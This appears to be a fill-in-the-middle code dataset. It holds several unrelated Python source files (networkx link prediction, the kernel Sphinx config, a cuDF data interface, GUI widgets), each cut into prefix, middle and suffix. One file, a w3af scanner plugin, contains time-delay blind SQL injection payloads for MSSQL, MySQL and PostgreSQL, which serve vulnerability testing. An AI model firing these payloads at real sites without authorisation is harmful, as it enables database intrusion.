repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
shanot/imp | tools/maintenance/fix_doxygen_file_lines.py | Python | gpl-3.0 | 593 | 0.001686 | #!/usr/bin/env python
import sys
import re
"""Rewrite the doxygen \\file lines to have the full path to the file."""
def fix(filename):
contents = open(filename, "r").read()
contents = re.sub(
"\\\\file .*\\.h",
"\\\\file " + filename[len("build/include/"):],
contents,
1)
contents = re.sub(
"\\\\file .*/.*\\.h",
"\\\\file " + filename[len("build/include/"):],
contents,
1)
f | = open(filename, "wr")
f.truncate()
f.write(contents)
if __name__ == '__main__':
for f in sys.argv[1:]: |
fix(f)
|
Admicos/DiscordBot | bot/commands/admin/setconf.py | Python | mit | 1,156 | 0.00346 | import discord
from bot import config
from bot import i18n
from bot.commands.command import Command
class ConfCommand(Command):
def requiresAdmin(self):
return True
def deleteCMDMsg(self):
return True
def command(self):
return "conf"
async def do(self, client: discord.Client, message: discord.Message, args: list, cfg={}):
if len(args) > 1:
key_name = args.pop(0)
key = config.get_key(message.server.id, key_name)
if key:
val = " ".join(args)
if isinstance(key, list):
config.set_key(message.server.id, key_name, list(val.split(",")))
await client.on_server_join(message.server)
return
config.set_key(message.server.id, key_name, val)
return
await client.send_message(message.channel, i18n.get_localized_str(message.server.id, "cmd_conf_nokey", {
"key": key_name
}))
| return
await client.send_message(message.channel, i18n.get_localized_str(message | .server.id, "cmd_conf_help"))
|
sserrot/champion_relationships | venv/Lib/site-packages/networkx/algorithms/link_prediction.py | Python | mit | 16,714 | 0 | """
Link prediction algorithms.
"""
from math import log
import networkx as nx
from networkx.utils import not_implemented_for
__all__ = ['resource_allocation_index',
'jaccard_coefficient',
'adamic_adar_index',
'preferential_attachment',
'cn_soundarajan_hopcroft',
'ra_index_soundarajan_hopcroft',
'within_inter_cluster']
def _apply_prediction(G, func, ebunch=None):
"""Applies the given function to each edge in the specified iterable
of edges.
`G` is an instance of :class:`networkx.Graph`.
`func` is a function on two inputs, each of which is a node in the
graph. The function can return anything, but it should return a
value representing a prediction of the likelihood of a "link"
joining the two nodes.
`ebunch` is an iterable of pairs of nodes. If not specified, all
non-edges in the graph `G` will be used.
"""
if ebunch is None:
ebunch = nx.non_edges(G)
return ((u, v, func(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def resource_allocation_index(G, ebunch=None):
r"""Compute the resource allocation index of all node pairs in ebunch.
Resource allocation index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{|\Gamma(w)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Resource allocation index will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their resource allocation index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.resource_allocation_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.75000000'
'(2, 3) -> 0.75000000'
References
----------
.. [1] T. Zhou, L. Lu, Y.-C. Zhang.
Predicting missing links via local information.
Eur. Phys. J. B 71 (2009) 623.
https://arxiv.org/pdf/0901.0553.pdf
"""
def predict(u, v):
return sum(1 / G.degree(w) for w in nx.common_neighbors(G, u, v))
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def jaccard_coefficient(G, ebunch=None):
r"""Compute the Jaccard coefficient of all node pairs in ebunch.
Jaccard coefficient of nodes `u` and `v` is defined as
.. math::
\frac{|\Gamma(u) \cap \Gamma(v)|}{|\Gamma(u) \cup \Gamma(v)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Jaccard coefficient will be computed for each pair of nodes
given in the iterable. The pairs must be given as 2-tuples
(u, v) where u and v are nodes in the graph. If ebunch is None
then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Jaccard coefficient.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.jaccard_coefficient(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.60000000'
'(2, 3) -> 0.60000000'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
union_size = len(set(G[u]) | set(G[v]))
if union_size == 0:
return 0
return len(list(nx.common_neighbors(G, u, v))) / union_size
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def adamic_adar_index(G, ebunch=None):
r"""Compute the Adamic-Adar index of all node pairs in ebunch.
Adamic-Adar index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{\log |\Gamma(w)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
This index leads to zero-division for nodes only connected via self-loops.
It is intended to be used when no self-loops are present.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Adamic-Adar index will be computed for each pair of nodes given
in the iterable. The pairs must be given as 2-tuples (u, v)
where u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Adamic-Adar index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.adamic_adar_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 2.16404256'
'(2, 3) -> 2.16404256'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
return sum(1 / log(G.degree(w)) for w in nx.common_neighbors(G, u, v))
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def preferential_attachment(G, ebunch=None):
r"""Compute the preferential attachment score of all node pairs in ebunch.
Preferential attachment score of `u` and `v` is defined as
.. math::
|\Gamma(u)| |\Gamma(v)|
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Preferential attachment score will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form ( | u, v, p) where (u, v) is a
pair of nodes and p is their preferential attachment score.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.preferential_attachment(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 1) -> 16'
'(2, 3) -> 16'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Soc | ial Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
return G.degree(u) * G.degree(v)
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cn_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Count the number of common neighbors of all node pairs in ebunch
using community information.
For two nodes $u$ and $v$, this function computes the number of
common neighbors |
adamdoupe/enemy-of-the-state | audit/blind_sqli_time_delay.py | Python | gpl-2.0 | 6,458 | 0.017188 | '''
blind_sqli_time_delay.py
Copyright 2008 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
from fuzzer import createMutants, createRandNum
import outputManager as om
import vuln as vuln
import knowledgeBase as kb
import severity as severity
import dbms as dbms
from w3afException import w3afException
# importing this to have sendMutant and setUrlOpener
from basePlugin import basePlugin
class blind_sqli_time_delay(basePlugin):
'''
This class tests for blind SQL injection bugs using time delays,
the logic is here and not as an audit plugin because this logic is also used in attack plugins.
@author: Andres Riancho ( andres.riancho@gmail.com )
'''
def __init__(self, crawler):
# ""I'm a plugin""
basePlugin.__init__(self, crawler)
# The wait time of the first test I'm going to perform
self._wait_time = 5
# The original delay between request and response
_original_wait_time = 0
def is_injectable( self, freq, parameter ):
'''
Check if "parameter" of the fuzzable request object is injectable or not.
@freq: The fuzzableRequest object that I have to modify
@parameter: A string with the parameter name to test
@return: A vulnerability object or None if nothing is found
'''
# First save the original wait time
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
# Create the mutants
parameter_to_test = [ parameter, ]
statement_list = self._get_statements()
sql_commands_only = [ i.sql_command for i in statement_list ]
mutants = createMutants( freq , sql_commands_only, fuzzableParamList=parameter_to_test )
# And now I assign the statement to the mutant
for statement in statement_list:
for mutant in mutants:
if statement.sql_command in mutant.getModValue():
mutant.statement = statement.sql_command
mutant.dbms = statement.dbms
# Perform the test
for mutant in mutants:
# Send
response = self._sendMutant( mutant, analyze=False )
# Compare times
if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
# Resend the same request to verify that this wasn't because of network delay
# or some other rare thing
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
response = self._sendMutant( mutant, analyze=False )
# Compare times (once again)
if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
# Now I can be sure that I found a vuln, I control the time of the response.
v = vuln.vuln( mutant )
v.setName( 'Blind SQL injection - ' + mutant.dbms )
v.setSeverity(severity.HIGH)
v.setDesc( 'Blind SQL injection was found at: ' + mutant.foundAt() )
v.setDc( mutant.getDc() )
v.setId( response.id )
v.setURI( response.getURI() )
return v
return None
def _get_statements( self ):
'''
@return: A list of statements that are going to be used to test for
blind SQL injections. The statements are objects.
'''
res = []
# MSSQL
res.append( statement("1;waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1);waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1';waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1');waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1'));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
# MySQL
# =====
# MySQL doesn't have a sleep function, so I have to use BENCHMARK(1000000000,MD5(1))
# but the benchmarking will delay the response a different amount of time in each computer
# which sucks because I use the time delay to check!
#
# In my test environment 3500000 delays 10 seconds
# This is why I selected 2500000 which is guaranteeded to (at least) delay 8
# seconds; and I only check the delay like this:
# response.getWaitTime() > (_original_wait_time + self._wait_time-2):
#
# With a small wait time of 5 seconds, this should work without problems...
# and without hitting the xUrllib timeout !
res.append( statement("1 or BENCHMARK(2500000,MD5(1))", dbms.MYSQL) )
res.append( statement("1' or BENCHMARK(2500000,MD5(1)) or '1'='1", dbms.MYSQL) )
res.append( statement('1" or BENCHMARK(2500000,MD5(1)) or "1"="1', dbms.MYSQL) )
# PostgreSQL
| res.append( statement("1 or pg_sleep("+ str(self._wait_time) +")", dbms.POSTGRE) )
res.append( statement("1' or pg_sleep("+ str(self._wait_time) +") or '1'='1", dbms.POSTGRE) )
res.append( statement('1" or pg_sleep('+ str(self._wait_time) + | ') or "1"="1', dbms.POSTGRE) )
# TODO: Add Oracle support
# TODO: Add XXXXX support
return res
class statement(object):
def __init__(self, sql_command, dbms):
self.sql_command = sql_command
self.dbms = dbms
|
walac/linux | Documentation/conf.py | Python | gpl-2.0 | 20,998 | 0.007953 | # -*- coding: utf-8 -*-
#
# The Linux Kernel documentation build configuration file, created by
# sphinx-quickstart on Fri Feb 12 13:51:46 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx
import subprocess
from distutils.version import LooseVersion
from subprocess import check_output
# Get Sphinx version
major, minor, patch = sphinx.version_info[:3]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('sphinx'))
from load_config import loadConfig
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['kerneldoc', 'rstFlatTable', 'kernel_include',
'kfigure', 'sphinx.ext.ifconfig', 'automarkup',
'maintainers_include', 'sphinx.ext.autosectionlabel',
'kernel_abi']
#
# cdomain is badly broken in Sphinx 3+. Leaving it out generates *most*
# of the docs correctly, but not all. Scream bloody murder but allow
# the process to proceed; hopefully somebody will fix this properly soon.
#
if major >= 3:
sys.stderr.write('''WARNING: The kernel documentation build process
support for Sphinx v3.0 and above is brand new. Be prepared for
possible issues in the generated output.
''')
if (major > 3) or (minor > 0 or patch >= 2):
# Sphinx c function parser is more pedantic with regards to type
# checking. Due to that, having macros at c:function cause problems.
# Those needed to be scaped by using c_id_attributes[] array
c_id_attributes = [
# GCC Compiler types not parsed by Sphinx:
"__restrict__",
# include/linux/compiler_types.h:
"__iomem",
"__kernel",
"noinstr",
"notrace",
"__percpu",
"__rcu",
"__user",
# include/linux/compiler_attributes.h:
"__alias",
"__aligned",
"__aligned_largest",
"__always_inline",
"__assume_aligned",
"__cold",
"__attribute_const__",
"__copy",
"__pure",
"__designated_init",
"__visible",
"__printf",
"__scanf",
"__gnu_inline",
"__malloc",
"__mode",
"__no_caller_saved_registers",
"__noclone",
"__nonstring",
"__noreturn",
"__packed",
"__pure",
"__section",
"__always_unused",
"__maybe_unused",
"__used",
"__weak",
"noinline",
# include/linux/memblock.h:
"__init_memblock",
"__meminit",
# include/linux/init.h:
"__init",
"__ref",
# include/linux/linkage.h:
"asmlinkage",
]
else:
extensions.append('cdomain')
# Ensure that autosectionlabel will produce unique names
autosectionlabel_prefix_document = True
autosectionlabel_maxdepth = 2
# The name of the math extension changed on Sphinx 1.4
if (major == 1 and minor > 3) or (major > 1):
extensions.append("sphinx.ext.imgmath")
else:
extensions.append("sphinx.ext.pngmath")
try:
hglyph_ver = subprocess.check_output(["hieroglyph", "--version"])
if LooseVersion(hglyph_ver) > LooseVersion("1.0.0"):
extensions.append('hieroglyph')
except:
None
extensions.append("ditaa")
extensions.append("asciicast")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'The Linux Kernel'
copyright = 'The kernel development community'
author = 'The kernel development community'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# In a normal build, version and release are are set to KERNELVERSION and
# KERNELRELEASE, respectively, from the Makefile via Sphinx command line
# arguments.
#
# The following code tries to extract the information by reading the Makefile,
# when Sphinx is run directly (e.g. by Read the Docs).
try:
makefile_version = None
makefile_patchlevel = None
for line in open('../Makefile'):
key, val = [x.strip() for x in line.split('=', 2)]
if key == 'VERSION':
makefile_version = val
elif key == 'PATCHLEVEL':
makefile_patchlevel = val
if makefile_version and makefile_patchlevel:
break
except:
pass
finally:
if makefile_version and makefile_patchlevel:
version = release = makefile_version + '.' + makefile_patchlevel
else:
version = release = "unknown version"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['output']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description |
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If tru | e, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
primary_domain = 'c'
highlight_language = 'none'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# The Read the Docs theme is available from
# - https://github.com/snide/sphinx_rtd_theme
# - https://pypi.python.org/pypi/sphinx_rtd_theme
# - python-sphinx-rtd-theme package (on Debian)
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
sys.stderr.write('Warning: The Sphinx \'sphinx_rtd_theme\' HTML theme was not found. Make sure you have the theme installed to produce pretty HTML output. Falling back to the default theme.\n')
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see th |
migasfree/migasfree-launcher | migasfree_indicator/console.py | Python | gpl-3.0 | 2,190 | 0.000457 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Alberto Gacías <alberto@migasfree.org>
# Copyright (c) 2015-2016 Jose Antonio Chavarría <jachavar@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gettext
_ = gettext.gettext
from gi.repository import Gtk
class Console(Gtk.Window):
def __init__(self):
super(Console, self).__init__()
sw = Gtk.ScrolledWindow()
sw.set_policy(
Gtk.PolicyType.AUTOMATIC,
Gtk.PolicyType.AUTOMATIC
)
self.textview = Gtk.TextView()
self.textbuffer = self.textview.get_buffer()
self.textview.set_editable(False)
self.textview.set_wrap_mo | de(Gtk.WrapMode.WORD)
sw.add(self.textview)
self.set_title(_('Migasfree Console'))
self.set_icon_name('migasfree')
self.resize(640, 4 | 20)
self.set_decorated(True)
self.set_border_width(10)
self.connect('delete-event', self.on_click_hide)
box = Gtk.Box(spacing=6, orientation='vertical')
box.pack_start(sw, expand=True, fill=True, padding=0)
self.progress = Gtk.ProgressBar()
self.progress.set_pulse_step(0.02)
progress_box = Gtk.Box(False, 0, orientation='vertical')
progress_box.pack_start(self.progress, False, True, 0)
box.pack_start(progress_box, expand=False, fill=True, padding=0)
self.add(box)
def on_timeout(self, user_data):
self.progress.pulse()
return True
def on_click_hide(self, widget, data=None):
self.hide()
return True
|
ioam/holoviews | holoviews/core/data/cudf.py | Python | bsd-3-clause | 12,346 | 0.001863 | import sys
import warnings
try:
import itertools.izip as zip
except ImportError:
pass
from itertools import product
import numpy as np
from .. import util
from ..dimension import dimension_name
from ..element import Element
from ..ndmapping import NdMapping, item_check, sorted_context
from .interface import DataError, Interface
from .pandas import PandasInterface
from .util import finite_range
class cuDFInterface(PandasInterface):
"""
The cuDFInterface allows a Dataset objects to wrap a cuDF
DataFrame object. Using cuDF allows working with columnar
data on a GPU. Most operations leave the data in GPU memory,
however to plot the data it has to be loaded into memory.
The cuDFInterface covers almost the complete API exposed
by the PandasInterface with two notable exceptions:
1) Aggregation and groupby do not have a consistent sort order
(see https://github.com/rapidsai/cudf/issues/4237)
3) Not all functions can be easily applied to a cuDF so
some functions applied with aggregate and reduce will not work.
"""
datatype = 'cuDF'
types = ()
@classmethod
def loaded(cls):
return 'cudf' in sys.modules
@classmethod
def applies(cls, obj):
if not cls.loaded():
return False
import cudf
return isinstance(obj, (cudf.DataFrame, cudf.Series))
@classmethod
def init(cls, eltype, data, kdims, vdims):
import cudf
import pandas as pd
element_params = eltype.param.objects()
kdim_param = element_params['kdims']
vdim_param = element_params['vdims']
if isinstance(data, (cudf.Series, pd.Series)):
data = data.to_frame()
if not isinstance(data, cudf.DataFrame):
data, _, _ = PandasInterface.init(eltype, data, kdims, vdims)
data = cudf.from_pandas(data)
columns = list(data.columns)
ncols = len(columns)
index_names = [data.index.name]
if index_names == [None]:
index_names = ['index']
if eltype._auto_indexable_1d and ncols == 1 and kdims is None:
kdims = list(index_names)
if isinstance(kdim_param.bounds[1], int):
ndim = min([kdim_param.bounds[1], len(kdim_param.default)])
else:
ndim = None
nvdim = vdim_param.bounds[1] if isinstance(vdim_param.bounds[1], int) else None
if kdims and vdims is None:
vdims = [c for c in columns if c not in kdims]
elif vdims and kdims is None:
kdims = [c for c in columns if c not in vdims][:ndim]
elif kdims is None:
kdims = list(columns[:ndim])
if vdims is None:
vdims = [d for d in columns[ndim:((ndim+nvdim) if nvdim else None)]
if d not in kdims]
elif kdims == [] and vdims is None:
vdims = list(columns[:nvdim if nvdim else None])
# Handle reset of index if kdims reference index by name
for kd in kdims:
kd = dimension_name(kd)
if kd in columns:
continue
if any(kd == ('index' if name is None else name)
for name in index_names):
data = data.reset_index()
break
if any(isinstance(d, (np.int64, int)) for d in kdims+vdims):
raise DataError("cudf DataFrame column names used as dimensions "
"must be strings not integers.", cls)
if kdims:
kdim = dimension_name(kdims[0])
if eltype._auto_indexable_1d and ncols == 1 and kdim not in columns:
data = data.copy()
data.insert(0, kdim, np.arange(len(data | )))
for d in kdims+vdims:
d = dimension_name(d)
if len([c for c in columns if c == d]) > 1:
raise DataError('Dimensions may not reference duplicated DataFrame '
'columns (found d | uplicate %r columns). If you want to plot '
'a column against itself simply declare two dimensions '
'with the same name. '% d, cls)
return data, {'kdims':kdims, 'vdims':vdims}, {}
@classmethod
def range(cls, dataset, dimension):
dimension = dataset.get_dimension(dimension, strict=True)
column = dataset.data[dimension.name]
if dimension.nodata is not None:
column = cls.replace_value(column, dimension.nodata)
if column.dtype.kind == 'O':
return np.NaN, np.NaN
else:
return finite_range(column, column.min(), column.max())
@classmethod
def values(cls, dataset, dim, expanded=True, flat=True, compute=True,
keep_index=False):
dim = dataset.get_dimension(dim, strict=True)
data = dataset.data[dim.name]
if not expanded:
data = data.unique()
return data.values_host if compute else data.values
elif keep_index:
return data
elif compute:
return data.values_host
try:
return data.values
except Exception:
return data.values_host
@classmethod
def groupby(cls, dataset, dimensions, container_type, group_type, **kwargs):
# Get dimensions information
dimensions = [dataset.get_dimension(d).name for d in dimensions]
kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]
# Update the kwargs appropriately for Element group types
group_kwargs = {}
group_type = dict if group_type == 'raw' else group_type
if issubclass(group_type, Element):
group_kwargs.update(util.get_param_values(dataset))
group_kwargs['kdims'] = kdims
group_kwargs.update(kwargs)
# Propagate dataset
group_kwargs['dataset'] = dataset.dataset
# Find all the keys along supplied dimensions
keys = product(*(dataset.data[dimensions[0]].unique().values_host for d in dimensions))
# Iterate over the unique entries applying selection masks
grouped_data = []
for unique_key in util.unique_iterator(keys):
group_data = dataset.select(**dict(zip(dimensions, unique_key)))
if not len(group_data):
continue
group_data = group_type(group_data, **group_kwargs)
grouped_data.append((unique_key, group_data))
if issubclass(container_type, NdMapping):
with item_check(False), sorted_context(False):
kdims = [dataset.get_dimension(d) for d in dimensions]
return container_type(grouped_data, kdims=kdims)
else:
return container_type(grouped_data)
@classmethod
def select_mask(cls, dataset, selection):
"""
Given a Dataset object and a dictionary with dimension keys and
selection keys (i.e. tuple ranges, slices, sets, lists, or literals)
return a boolean mask over the rows in the Dataset object that
have been selected.
"""
mask = None
for dim, sel in selection.items():
if isinstance(sel, tuple):
sel = slice(*sel)
arr = cls.values(dataset, dim, keep_index=True)
if util.isdatetime(arr) and util.pd:
try:
sel = util.parse_datetime_selection(sel)
except:
pass
new_masks = []
if isinstance(sel, slice):
with warnings.catch_warnings():
warnings.filterwarnings('ignore', r'invalid value encountered')
if sel.start is not None:
new_masks.append(sel.start <= arr)
if sel.stop is not None:
new_masks.append(arr < sel.stop)
if not new_masks:
continue
new_mask = new_masks[0]
for imask in new_masks[1:]:
new_mask &= imask
elif isinstance(sel, (set, list)) |
unioslo/cerebrum | testsuite/tests/test_core/test_utils/test_scriptargs.py | Python | gpl-2.0 | 925 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Unit tests for script argument utilities. """
from __future__ import print_function, unicode_literals
import pytest
import argparse
from Cerebrum.utils.scriptargs import build_callback_action
class CallbackCalled(Exception):
pass
def test_build_callback_action():
def callback(*args, **kwargs):
raise CallbackCalled
def noop(*args, **kwargs):
pass
parser = argparse.ArgumentParser()
parser.add_argument('--foo',
action=build_callback_action(callback, exit=False),
help="Foo")
parser.add_argument('--bar',
action=build_callback_action(noop, exit=True),
help="Bar")
with pytest.raises(CallbackCalled):
parser.parse_args(['this', '--foo'])
| with pytest.raises(SystemExit):
parser.parse | _args(['this', '--bar'])
|
tescalada/npyscreen-restructure | tests/testingSliders.py | Python | bsd-2-clause | 314 | 0.015924 | import npyscreen
import curses
def sliderTest(screen):
F = npyscreen.Form()
F. | add(npyscreen.TitleSlider, name="Slider 1")
F.add(npyscreen.TitleSlider, color='STANDOUT', name="Slider 2")
F.add(npyscreen.Slider, name="Slider 3")
F.edit()
if __name__ == "__main__":
curses.wrapper(slid | erTest) |
GafferHQ/gaffer | python/GafferUI/MenuButton.py | Python | bsd-3-clause | 3,944 | 0.02713 | ##########################################################################
#
# Copyright (c) 2012-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to th | is software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMP | LIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import imath
import IECore
import Gaffer
import GafferUI
class MenuButton( GafferUI.Button ) :
def __init__( self, text="", image=None, hasFrame=True, menu=None, **kw ) :
GafferUI.Button.__init__( self, text, image, hasFrame, **kw )
self.__menu = None
self.setMenu( menu )
self._qtWidget().pressed.connect( Gaffer.WeakMethod( self.__pressed ) )
def setMenu( self, menu ) :
# Note that although QPushButton does have a setMenu() method that would
# ostensibly do everything for us, we don't use it. Primarily this is because
# it pops the menu up in utterly the wrong position when we place a MenuButton
# in GLWidget overlay - this is a Qt bug. Secondarily, we also want to use
# Menu.popup() as it gives the menu a parent for return from Menu.parent(),
# which may be important to the menu item callbacks.
if menu is self.__menu :
return
self.__menu = menu
if self.__menu is not None :
self.__menuVisibilityChangedConnection = self.__menu.visibilityChangedSignal().connect(
Gaffer.WeakMethod( self.__menuVisibilityChanged ),
scoped = True
)
else :
self.__menuVisibilityChangedConnection = None
self.setEnabled( self.__menu is not None )
def getMenu( self ) :
return self.__menu
def setText( self, text ) :
GafferUI.Button.setText( self, text )
# Because we can't use QPushButton::setMenu() to manage our menus,
# we also can't use the QPushButton::menu-indicator subcontrol to
# style menus. Instead we use this custom property to drive the
